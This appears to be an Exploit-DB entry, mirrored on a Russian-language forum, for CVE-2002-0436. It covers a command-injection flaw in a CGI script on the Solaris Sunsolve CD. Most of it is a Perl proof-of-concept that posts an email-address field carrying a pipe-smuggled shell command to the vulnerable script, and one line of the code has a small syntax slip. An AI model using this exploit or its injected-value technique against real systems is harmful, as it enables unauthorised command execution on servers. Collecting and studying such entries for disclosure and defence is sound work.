- 34,644
- 0
- 18 Дек 2022
- EDB-ID
- 21340
- Проверка EDB
-
- Пройдено
- Автор
- FYODOR
- Тип уязвимости
- REMOTE
- Платформа
- CGI
- CVE
- cve-2002-0436
- Дата публикации
- 2002-03-11
Код:
source: https://www.securityfocus.com/bid/4269/info
The Sunsolve CD is part of the Solaris Media pack. It is included as a documentation resource, and is available for the Solaris Operating Environment.
A CGI script included with the CD does not adequately sanitize input. Due to a design failure which does not remove special characters such as the pipe (|) character, a user submitting a malicious email address to the script could execute arbitrary commands with the permissions of the executing program.
#!/usr/bin/perl
use LWP::UserAgent;
use HTTP::Request::Common qw(POST);
ua = new LWP::UserAgent;
$ua->agent("Scrapers");
my $req = POST 'http://sunsolveCD.box.com:8383/cd-cgi/sscd_suncourier.pl',
[
step => "submit" ,
emailaddr => "foo\@bar.com| id > /tmp/foo|"];
$res = $ua->request($req);
print $res->as_string;
print "code", $res->code, "\n";
- Источник
- www.exploit-db.com